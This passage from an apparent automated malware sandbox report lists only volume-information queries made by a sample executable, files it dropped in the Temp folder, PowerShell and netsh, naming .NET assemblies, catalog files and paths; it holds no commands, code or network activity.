      Source: C:\Users\user\Desktop\We7WnoqeXe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\We7WnoqeXe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\We7WnoqeXe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\We7WnoqeXe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\We7WnoqeXe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\We7WnoqeXe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\We7WnoqeXe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\We7WnoqeXe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\We7WnoqeXe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\We7WnoqeXe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\We7WnoqeXe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\We7WnoqeXe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\We7WnoqeXe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\We7WnoqeXe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\We7WnoqeXe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\slhost.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\slhost.exeQueries volume information: C:\ProgramData\Systemd VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\vms\vms.exe VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\vms\vms.exe VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\slhost\slhost.exe VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152138533219 VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeQueries volume information: C:\Users\user\AppData\Local\Temp\slhost\slhost.exe VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0011~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0011~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00114~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
      Source: C:\Windows\System32\netsh.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\netsh.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0011~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0011~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00114~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\netsh.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\netsh.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\1.2\Microsoft.PowerShell.PSReadline.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
